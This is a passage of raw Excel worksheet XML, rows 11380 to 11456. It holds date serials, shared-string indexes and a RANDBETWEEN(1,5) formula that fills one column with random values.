    </row>
    <row r="11380" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11380" s="1">
        <v>43319.617303240739</v>
      </c>
      <c r="C11380" t="s">
        <v>10</v>
      </c>
      <c r="D11380" t="s">
        <v>381</v>
      </c>
      <c r="E11380" t="s">
        <v>10184</v>
      </c>
      <c r="F11380">
        <f t="shared" ca="1" si="177"/>
        <v>1</v>
      </c>
    </row>
    <row r="11381" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11381" s="1">
        <v>43319.5940625</v>
      </c>
      <c r="C11381" t="s">
        <v>10</v>
      </c>
      <c r="D11381" t="s">
        <v>23</v>
      </c>
      <c r="E11381" s="2" t="s">
        <v>10185</v>
      </c>
      <c r="F11381">
        <f t="shared" ca="1" si="177"/>
        <v>1</v>
      </c>
    </row>
    <row r="11382" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A11382" s="1">
        <v>43319.593287037038</v>
      </c>
      <c r="C11382" t="s">
        <v>10</v>
      </c>
      <c r="D11382" t="s">
        <v>192</v>
      </c>
      <c r="E11382" s="2" t="s">
        <v>10186</v>
      </c>
      <c r="F11382">
        <f t="shared" ca="1" si="177"/>
        <v>4</v>
      </c>
    </row>
    <row r="11383" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A11383" s="1">
        <v>43319.587766203702</v>
      </c>
      <c r="C11383" t="s">
        <v>10</v>
      </c>
      <c r="D11383" t="s">
        <v>6</v>
      </c>
      <c r="E11383" s="2" t="s">
        <v>10187</v>
      </c>
      <c r="F11383">
        <f t="shared" ca="1" si="177"/>
        <v>2</v>
      </c>
    </row>
    <row r="11384" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11384" s="1">
        <v>43319.585312499999</v>
      </c>
      <c r="C11384" t="s">
        <v>10</v>
      </c>
      <c r="D11384" t="s">
        <v>86</v>
      </c>
      <c r="E11384" t="s">
        <v>10188</v>
      </c>
      <c r="F11384">
        <f t="shared" ca="1" si="177"/>
        <v>2</v>
      </c>
    </row>
    <row r="11385" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11385" s="1">
        <v>43319.584687499999</v>
      </c>
      <c r="C11385" t="s">
        <v>10</v>
      </c>
      <c r="D11385" t="s">
        <v>192</v>
      </c>
      <c r="E11385" t="s">
        <v>10189</v>
      </c>
      <c r="F11385">
        <f t="shared" ca="1" si="177"/>
        <v>1</v>
      </c>
    </row>
    <row r="11386" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11386" s="1">
        <v>43319.584629629629</v>
      </c>
      <c r="C11386" t="s">
        <v>10</v>
      </c>
      <c r="D11386" t="s">
        <v>192</v>
      </c>
      <c r="E11386" t="s">
        <v>10189</v>
      </c>
      <c r="F11386">
        <f t="shared" ca="1" si="177"/>
        <v>1</v>
      </c>
    </row>
    <row r="11387" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11387" s="1">
        <v>43319.584340277775</v>
      </c>
      <c r="C11387" t="s">
        <v>10</v>
      </c>
      <c r="D11387" t="s">
        <v>192</v>
      </c>
      <c r="E11387" t="s">
        <v>10190</v>
      </c>
      <c r="F11387">
        <f t="shared" ca="1" si="177"/>
        <v>1</v>
      </c>
    </row>
    <row r="11388" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11388" s="1">
        <v>43319.574004629627</v>
      </c>
      <c r="C11388" t="s">
        <v>10</v>
      </c>
      <c r="D11388" t="s">
        <v>52</v>
      </c>
      <c r="E11388" t="s">
        <v>10191</v>
      </c>
      <c r="F11388">
        <f t="shared" ca="1" si="177"/>
        <v>1</v>
      </c>
    </row>
    <row r="11389" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A11389" s="1">
        <v>43319.560960648145</v>
      </c>
      <c r="C11389" t="s">
        <v>10</v>
      </c>
      <c r="D11389" t="s">
        <v>52</v>
      </c>
      <c r="E11389" s="2" t="s">
        <v>10192</v>
      </c>
      <c r="F11389">
        <f t="shared" ca="1" si="177"/>
        <v>2</v>
      </c>
    </row>
    <row r="11390" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11390" s="1">
        <v>43319.558969907404</v>
      </c>
      <c r="C11390" t="s">
        <v>10</v>
      </c>
      <c r="D11390" t="s">
        <v>52</v>
      </c>
      <c r="E11390" s="2" t="s">
        <v>10193</v>
      </c>
      <c r="F11390">
        <f t="shared" ca="1" si="177"/>
        <v>4</v>
      </c>
    </row>
    <row r="11391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11391" s="1">
        <v>43319.555034722223</v>
      </c>
      <c r="C11391" t="s">
        <v>10</v>
      </c>
      <c r="D11391" t="s">
        <v>14</v>
      </c>
      <c r="E11391" t="s">
        <v>10194</v>
      </c>
      <c r="F11391">
        <f t="shared" ca="1" si="177"/>
        <v>4</v>
      </c>
    </row>
    <row r="11392" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11392" s="1">
        <v>43319.553877314815</v>
      </c>
      <c r="C11392" t="s">
        <v>10</v>
      </c>
      <c r="D11392" t="s">
        <v>6</v>
      </c>
      <c r="E11392" t="s">
        <v>10195</v>
      </c>
      <c r="F11392">
        <f t="shared" ca="1" si="177"/>
        <v>3</v>
      </c>
    </row>
    <row r="11393" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11393" s="1">
        <v>43319.540254629632</v>
      </c>
      <c r="C11393" t="s">
        <v>10</v>
      </c>
      <c r="D11393" t="s">
        <v>112</v>
      </c>
      <c r="E11393" t="s">
        <v>10196</v>
      </c>
      <c r="F11393">
        <f t="shared" ca="1" si="177"/>
        <v>5</v>
      </c>
    </row>
    <row r="11394" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A11394" s="1">
        <v>43319.529594907406</v>
      </c>
      <c r="C11394" t="s">
        <v>103</v>
      </c>
      <c r="D11394" t="s">
        <v>11</v>
      </c>
      <c r="E11394" s="2" t="s">
        <v>10197</v>
      </c>
      <c r="F11394">
        <f t="shared" ref="F11394:F11457" ca="1" si="178">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="11395" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A11395" s="1">
        <v>43319.51121527778</v>
      </c>
      <c r="C11395" t="s">
        <v>10</v>
      </c>
      <c r="D11395" t="s">
        <v>6</v>
      </c>
      <c r="E11395" s="2" t="s">
        <v>10198</v>
      </c>
      <c r="F11395">
        <f t="shared" ca="1" si="178"/>
        <v>1</v>
      </c>
    </row>
    <row r="11396" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11396" s="1">
        <v>43319.506921296299</v>
      </c>
      <c r="C11396" t="s">
        <v>10</v>
      </c>
      <c r="D11396" t="s">
        <v>89</v>
      </c>
      <c r="E11396" t="s">
        <v>10199</v>
      </c>
      <c r="F11396">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11397" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11397" s="1">
        <v>43319.478136574071</v>
      </c>
      <c r="C11397" t="s">
        <v>10</v>
      </c>
      <c r="D11397" t="s">
        <v>336</v>
      </c>
      <c r="E11397" t="s">
        <v>10200</v>
      </c>
      <c r="F11397">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11398" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11398" s="1">
        <v>43319.475185185183</v>
      </c>
      <c r="C11398" t="s">
        <v>10</v>
      </c>
      <c r="D11398" t="s">
        <v>251</v>
      </c>
      <c r="E11398" t="s">
        <v>10201</v>
      </c>
      <c r="F11398">
        <f t="shared" ca="1" si="178"/>
        <v>4</v>
      </c>
    </row>
    <row r="11399" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11399" s="1">
        <v>43319.473310185182</v>
      </c>
      <c r="C11399" t="s">
        <v>48</v>
      </c>
      <c r="E11399" t="s">
        <v>10202</v>
      </c>
      <c r="F11399">
        <f t="shared" ca="1" si="178"/>
        <v>1</v>
      </c>
    </row>
    <row r="11400" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11400" s="1">
        <v>43319.47042824074</v>
      </c>
      <c r="C11400" t="s">
        <v>16</v>
      </c>
      <c r="E11400" t="s">
        <v>10203</v>
      </c>
      <c r="F11400">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11401" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A11401" s="1">
        <v>43319.469849537039</v>
      </c>
      <c r="C11401" t="s">
        <v>10</v>
      </c>
      <c r="D11401" t="s">
        <v>112</v>
      </c>
      <c r="E11401" s="2" t="s">
        <v>10204</v>
      </c>
      <c r="F11401">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11402" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A11402" s="1">
        <v>43319.457129629627</v>
      </c>
      <c r="C11402" t="s">
        <v>5020</v>
      </c>
      <c r="D11402" t="s">
        <v>25</v>
      </c>
      <c r="E11402" s="2" t="s">
        <v>10205</v>
      </c>
      <c r="F11402">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11403" s="1">
        <v>43319.437523148146</v>
      </c>
      <c r="C11403" t="s">
        <v>10</v>
      </c>
      <c r="D11403" t="s">
        <v>14</v>
      </c>
      <c r="E11403" t="s">
        <v>10206</v>
      </c>
      <c r="F11403">
        <f t="shared" ca="1" si="178"/>
        <v>5</v>
      </c>
    </row>
    <row r="11404" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11404" s="1">
        <v>43319.430798611109</v>
      </c>
      <c r="C11404" t="s">
        <v>10</v>
      </c>
      <c r="D11404" t="s">
        <v>20</v>
      </c>
      <c r="F11404">
        <f t="shared" ca="1" si="178"/>
        <v>1</v>
      </c>
    </row>
    <row r="11405" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11405" s="1">
        <v>43319.428900462961</v>
      </c>
      <c r="C11405" t="s">
        <v>301</v>
      </c>
      <c r="E11405" t="s">
        <v>10207</v>
      </c>
      <c r="F11405">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11406" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11406" s="1">
        <v>43319.428229166668</v>
      </c>
      <c r="C11406" t="s">
        <v>559</v>
      </c>
      <c r="E11406" s="2" t="s">
        <v>10208</v>
      </c>
      <c r="F11406">
        <f t="shared" ca="1" si="178"/>
        <v>4</v>
      </c>
    </row>
    <row r="11407" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A11407" s="1">
        <v>43319.42260416667</v>
      </c>
      <c r="C11407" t="s">
        <v>103</v>
      </c>
      <c r="D11407" t="s">
        <v>232</v>
      </c>
      <c r="E11407" s="2" t="s">
        <v>10209</v>
      </c>
      <c r="F11407">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11408" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11408" s="1">
        <v>43319.418530092589</v>
      </c>
      <c r="C11408" t="s">
        <v>461</v>
      </c>
      <c r="E11408" s="2" t="s">
        <v>10210</v>
      </c>
      <c r="F11408">
        <f t="shared" ca="1" si="178"/>
        <v>1</v>
      </c>
    </row>
    <row r="11409" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11409" s="1">
        <v>43319.405995370369</v>
      </c>
      <c r="C11409" t="s">
        <v>197</v>
      </c>
      <c r="E11409" s="2" t="s">
        <v>10211</v>
      </c>
      <c r="F11409">
        <f t="shared" ca="1" si="178"/>
        <v>4</v>
      </c>
    </row>
    <row r="11410" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11410" s="1">
        <v>43319.40425925926</v>
      </c>
      <c r="C11410" t="s">
        <v>197</v>
      </c>
      <c r="E11410" s="2" t="s">
        <v>10211</v>
      </c>
      <c r="F11410">
        <f t="shared" ca="1" si="178"/>
        <v>5</v>
      </c>
    </row>
    <row r="11411" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11411" s="1">
        <v>43319.395937499998</v>
      </c>
      <c r="C11411" t="s">
        <v>10</v>
      </c>
      <c r="D11411" t="s">
        <v>263</v>
      </c>
      <c r="E11411" t="s">
        <v>10212</v>
      </c>
      <c r="F11411">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11412" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11412" s="1">
        <v>43319.350381944445</v>
      </c>
      <c r="C11412" t="s">
        <v>10</v>
      </c>
      <c r="D11412" t="s">
        <v>163</v>
      </c>
      <c r="E11412" t="s">
        <v>10213</v>
      </c>
      <c r="F11412">
        <f t="shared" ca="1" si="178"/>
        <v>5</v>
      </c>
    </row>
    <row r="11413" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A11413" s="1">
        <v>43319.250960648147</v>
      </c>
      <c r="C11413" t="s">
        <v>43</v>
      </c>
      <c r="E11413" s="2" t="s">
        <v>10214</v>
      </c>
      <c r="F11413">
        <f t="shared" ca="1" si="178"/>
        <v>5</v>
      </c>
    </row>
    <row r="11414" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11414" s="1">
        <v>43319.241539351853</v>
      </c>
      <c r="C11414" t="s">
        <v>9882</v>
      </c>
      <c r="D11414" t="s">
        <v>6</v>
      </c>
      <c r="E11414" s="2" t="s">
        <v>10215</v>
      </c>
      <c r="F11414">
        <f t="shared" ca="1" si="178"/>
        <v>1</v>
      </c>
    </row>
    <row r="11415" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11415" s="1">
        <v>43319.241273148145</v>
      </c>
      <c r="C11415" t="s">
        <v>2733</v>
      </c>
      <c r="D11415" t="s">
        <v>89</v>
      </c>
      <c r="E11415" t="s">
        <v>9877</v>
      </c>
      <c r="F11415">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11416" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11416" s="1">
        <v>43319.228333333333</v>
      </c>
      <c r="C11416" t="s">
        <v>542</v>
      </c>
      <c r="D11416" t="s">
        <v>821</v>
      </c>
      <c r="E11416" t="s">
        <v>9877</v>
      </c>
      <c r="F11416">
        <f t="shared" ca="1" si="178"/>
        <v>1</v>
      </c>
    </row>
    <row r="11417" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11417" s="1">
        <v>43319.217418981483</v>
      </c>
      <c r="C11417" t="s">
        <v>124</v>
      </c>
      <c r="E11417" s="2" t="s">
        <v>10216</v>
      </c>
      <c r="F11417">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11418" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11418" s="1">
        <v>43319.199212962965</v>
      </c>
      <c r="C11418" t="s">
        <v>3150</v>
      </c>
      <c r="D11418" t="s">
        <v>602</v>
      </c>
      <c r="E11418" s="2" t="s">
        <v>10217</v>
      </c>
      <c r="F11418">
        <f t="shared" ca="1" si="178"/>
        <v>4</v>
      </c>
    </row>
    <row r="11419" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A11419" s="1">
        <v>43319.141273148147</v>
      </c>
      <c r="C11419" t="s">
        <v>993</v>
      </c>
      <c r="D11419" t="s">
        <v>251</v>
      </c>
      <c r="E11419" s="2" t="s">
        <v>10218</v>
      </c>
      <c r="F11419">
        <f t="shared" ca="1" si="178"/>
        <v>4</v>
      </c>
    </row>
    <row r="11420" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11420" s="1">
        <v>43319.134016203701</v>
      </c>
      <c r="C11420" t="s">
        <v>139</v>
      </c>
      <c r="E11420" t="s">
        <v>10219</v>
      </c>
      <c r="F11420">
        <f t="shared" ca="1" si="178"/>
        <v>1</v>
      </c>
    </row>
    <row r="11421" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11421" s="1">
        <v>43319.126747685186</v>
      </c>
      <c r="C11421" t="s">
        <v>7491</v>
      </c>
      <c r="D11421" t="s">
        <v>14</v>
      </c>
      <c r="E11421" s="2" t="s">
        <v>10220</v>
      </c>
      <c r="F11421">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11422" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A11422" s="1">
        <v>43319.120752314811</v>
      </c>
      <c r="C11422" t="s">
        <v>6829</v>
      </c>
      <c r="D11422" t="s">
        <v>41</v>
      </c>
      <c r="E11422" s="2" t="s">
        <v>10221</v>
      </c>
      <c r="F11422">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11423" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11423" s="1">
        <v>43319.106851851851</v>
      </c>
      <c r="C11423" t="s">
        <v>4358</v>
      </c>
      <c r="D11423" t="s">
        <v>107</v>
      </c>
      <c r="E11423" s="2" t="s">
        <v>10222</v>
      </c>
      <c r="F11423">
        <f t="shared" ca="1" si="178"/>
        <v>4</v>
      </c>
    </row>
    <row r="11424" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11424" s="1">
        <v>43319.099409722221</v>
      </c>
      <c r="C11424" t="s">
        <v>408</v>
      </c>
      <c r="F11424">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11425" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11425" s="1">
        <v>43319.033854166664</v>
      </c>
      <c r="C11425" t="s">
        <v>140</v>
      </c>
      <c r="D11425" t="s">
        <v>197</v>
      </c>
      <c r="E11425" t="s">
        <v>10223</v>
      </c>
      <c r="F11425">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11426" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11426" s="1">
        <v>43319.019375000003</v>
      </c>
      <c r="C11426" t="s">
        <v>253</v>
      </c>
      <c r="D11426" t="s">
        <v>151</v>
      </c>
      <c r="E11426" s="2" t="s">
        <v>10224</v>
      </c>
      <c r="F11426">
        <f t="shared" ca="1" si="178"/>
        <v>4</v>
      </c>
    </row>
    <row r="11427" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11427" s="1">
        <v>43319.018587962964</v>
      </c>
      <c r="C11427" t="s">
        <v>144</v>
      </c>
      <c r="D11427" t="s">
        <v>192</v>
      </c>
      <c r="E11427" s="2" t="s">
        <v>10225</v>
      </c>
      <c r="F11427">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11428" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11428" s="1">
        <v>43319.003703703704</v>
      </c>
      <c r="C11428" t="s">
        <v>63</v>
      </c>
      <c r="E11428" s="2" t="s">
        <v>10226</v>
      </c>
      <c r="F11428">
        <f t="shared" ca="1" si="178"/>
        <v>4</v>
      </c>
    </row>
    <row r="11429" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11429" s="1">
        <v>43318.998969907407</v>
      </c>
      <c r="C11429" t="s">
        <v>2225</v>
      </c>
      <c r="E11429" s="2" t="s">
        <v>4166</v>
      </c>
      <c r="F11429">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11430" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11430" s="1">
        <v>43318.997939814813</v>
      </c>
      <c r="C11430" t="s">
        <v>43</v>
      </c>
      <c r="E11430" s="2" t="s">
        <v>10227</v>
      </c>
      <c r="F11430">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11431" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11431" s="1">
        <v>43318.992673611108</v>
      </c>
      <c r="C11431" t="s">
        <v>10</v>
      </c>
      <c r="D11431" t="s">
        <v>17</v>
      </c>
      <c r="F11431">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11432" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11432" s="1">
        <v>43318.981874999998</v>
      </c>
      <c r="C11432" t="s">
        <v>166</v>
      </c>
      <c r="E11432" t="s">
        <v>10228</v>
      </c>
      <c r="F11432">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11433" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11433" s="1">
        <v>43318.960150462961</v>
      </c>
      <c r="C11433" t="s">
        <v>139</v>
      </c>
      <c r="E11433" t="s">
        <v>10229</v>
      </c>
      <c r="F11433">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11434" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11434" s="1">
        <v>43318.934652777774</v>
      </c>
      <c r="C11434" t="s">
        <v>328</v>
      </c>
      <c r="D11434" t="s">
        <v>151</v>
      </c>
      <c r="E11434" s="2" t="s">
        <v>10230</v>
      </c>
      <c r="F11434">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11435" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11435" s="1">
        <v>43318.929155092592</v>
      </c>
      <c r="C11435" t="s">
        <v>43</v>
      </c>
      <c r="D11435" t="s">
        <v>232</v>
      </c>
      <c r="E11435" s="2" t="s">
        <v>10231</v>
      </c>
      <c r="F11435">
        <f t="shared" ca="1" si="178"/>
        <v>1</v>
      </c>
    </row>
    <row r="11436" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11436" s="1">
        <v>43318.916493055556</v>
      </c>
      <c r="C11436" t="s">
        <v>1064</v>
      </c>
      <c r="E11436" t="s">
        <v>10232</v>
      </c>
      <c r="F11436">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11437" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11437" s="1">
        <v>43318.853356481479</v>
      </c>
      <c r="C11437" t="s">
        <v>82</v>
      </c>
      <c r="D11437" t="s">
        <v>11</v>
      </c>
      <c r="E11437" s="2" t="s">
        <v>10233</v>
      </c>
      <c r="F11437">
        <f t="shared" ca="1" si="178"/>
        <v>1</v>
      </c>
    </row>
    <row r="11438" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11438" s="1">
        <v>43318.85</v>
      </c>
      <c r="C11438" t="s">
        <v>3106</v>
      </c>
      <c r="D11438" t="s">
        <v>86</v>
      </c>
      <c r="F11438">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11439" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11439" s="1">
        <v>43318.840543981481</v>
      </c>
      <c r="C11439" t="s">
        <v>10</v>
      </c>
      <c r="F11439">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11440" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11440" s="1">
        <v>43318.837858796294</v>
      </c>
      <c r="C11440" t="s">
        <v>2552</v>
      </c>
      <c r="D11440" t="s">
        <v>244</v>
      </c>
      <c r="E11440" s="2" t="s">
        <v>10234</v>
      </c>
      <c r="F11440">
        <f t="shared" ca="1" si="178"/>
        <v>5</v>
      </c>
    </row>
    <row r="11441" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A11441" s="1">
        <v>43318.830578703702</v>
      </c>
      <c r="C11441" t="s">
        <v>103</v>
      </c>
      <c r="D11441" t="s">
        <v>667</v>
      </c>
      <c r="E11441" s="2" t="s">
        <v>10235</v>
      </c>
      <c r="F11441">
        <f t="shared" ca="1" si="178"/>
        <v>4</v>
      </c>
    </row>
    <row r="11442" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11442" s="1">
        <v>43318.798414351855</v>
      </c>
      <c r="C11442" t="s">
        <v>10</v>
      </c>
      <c r="D11442" t="s">
        <v>11</v>
      </c>
      <c r="E11442" t="s">
        <v>10236</v>
      </c>
      <c r="F11442">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11443" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11443" s="1">
        <v>43318.777638888889</v>
      </c>
      <c r="C11443" t="s">
        <v>10</v>
      </c>
      <c r="D11443" t="s">
        <v>11</v>
      </c>
      <c r="E11443" s="2" t="s">
        <v>10237</v>
      </c>
      <c r="F11443">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11444" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11444" s="1">
        <v>43318.749074074076</v>
      </c>
      <c r="C11444" t="s">
        <v>10</v>
      </c>
      <c r="D11444" t="s">
        <v>20</v>
      </c>
      <c r="E11444" s="2" t="s">
        <v>10238</v>
      </c>
      <c r="F11444">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11445" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11445" s="1">
        <v>43318.74046296296</v>
      </c>
      <c r="C11445" t="s">
        <v>845</v>
      </c>
      <c r="D11445" t="s">
        <v>52</v>
      </c>
      <c r="E11445" s="2" t="s">
        <v>10239</v>
      </c>
      <c r="F11445">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11446" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11446" s="1">
        <v>43318.731574074074</v>
      </c>
      <c r="C11446" t="s">
        <v>10</v>
      </c>
      <c r="D11446" t="s">
        <v>667</v>
      </c>
      <c r="E11446" t="s">
        <v>10240</v>
      </c>
      <c r="F11446">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11447" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A11447" s="1">
        <v>43318.7265625</v>
      </c>
      <c r="C11447" t="s">
        <v>10</v>
      </c>
      <c r="D11447" t="s">
        <v>6</v>
      </c>
      <c r="E11447" s="2" t="s">
        <v>10241</v>
      </c>
      <c r="F11447">
        <f t="shared" ca="1" si="178"/>
        <v>4</v>
      </c>
    </row>
    <row r="11448" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A11448" s="1">
        <v>43318.721261574072</v>
      </c>
      <c r="C11448" t="s">
        <v>103</v>
      </c>
      <c r="D11448" t="s">
        <v>993</v>
      </c>
      <c r="E11448" s="2" t="s">
        <v>10242</v>
      </c>
      <c r="F11448">
        <f t="shared" ca="1" si="178"/>
        <v>5</v>
      </c>
    </row>
    <row r="11449" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11449" s="1">
        <v>43318.70516203704</v>
      </c>
      <c r="C11449" t="s">
        <v>10</v>
      </c>
      <c r="D11449" t="s">
        <v>52</v>
      </c>
      <c r="E11449" t="s">
        <v>10243</v>
      </c>
      <c r="F11449">
        <f t="shared" ca="1" si="178"/>
        <v>4</v>
      </c>
    </row>
    <row r="11450" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11450" s="1">
        <v>43318.701053240744</v>
      </c>
      <c r="C11450" t="s">
        <v>10</v>
      </c>
      <c r="D11450" t="s">
        <v>46</v>
      </c>
      <c r="E11450" t="s">
        <v>10244</v>
      </c>
      <c r="F11450">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11451" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11451" s="1">
        <v>43318.69740740741</v>
      </c>
      <c r="C11451" t="s">
        <v>2428</v>
      </c>
      <c r="D11451" t="s">
        <v>713</v>
      </c>
      <c r="E11451" s="2" t="s">
        <v>10245</v>
      </c>
      <c r="F11451">
        <f t="shared" ca="1" si="178"/>
        <v>1</v>
      </c>
    </row>
    <row r="11452" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11452" s="1">
        <v>43318.69321759259</v>
      </c>
      <c r="C11452" t="s">
        <v>10</v>
      </c>
      <c r="D11452" t="s">
        <v>151</v>
      </c>
      <c r="E11452" t="s">
        <v>10246</v>
      </c>
      <c r="F11452">
        <f t="shared" ca="1" si="178"/>
        <v>4</v>
      </c>
    </row>
    <row r="11453" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A11453" s="1">
        <v>43318.689386574071</v>
      </c>
      <c r="C11453" t="s">
        <v>107</v>
      </c>
      <c r="E11453" s="2" t="s">
        <v>10247</v>
      </c>
      <c r="F11453">
        <f t="shared" ca="1" si="178"/>
        <v>5</v>
      </c>
    </row>
    <row r="11454" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A11454" s="1">
        <v>43318.688518518517</v>
      </c>
      <c r="C11454" t="s">
        <v>10</v>
      </c>
      <c r="D11454" t="s">
        <v>36</v>
      </c>
      <c r="E11454" s="2" t="s">
        <v>10248</v>
      </c>
      <c r="F11454">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11455" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11455" s="1">
        <v>43318.684050925927</v>
      </c>
      <c r="C11455" t="s">
        <v>10</v>
      </c>
      <c r="D11455" t="s">
        <v>52</v>
      </c>
      <c r="E11455" t="s">
        <v>10249</v>
      </c>
      <c r="F11455">
        <f t="shared" ca="1" si="178"/>
        <v>2</v>
      </c>
    </row>
    <row r="11456" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11456" s="1">
        <v>43318.665659722225</v>
      </c>
      <c r="C11456" t="s">
        <v>729</v>
      </c>
      <c r="D11456" t="s">
        <v>14</v>
      </c>
      <c r="E11456" s="2" t="s">
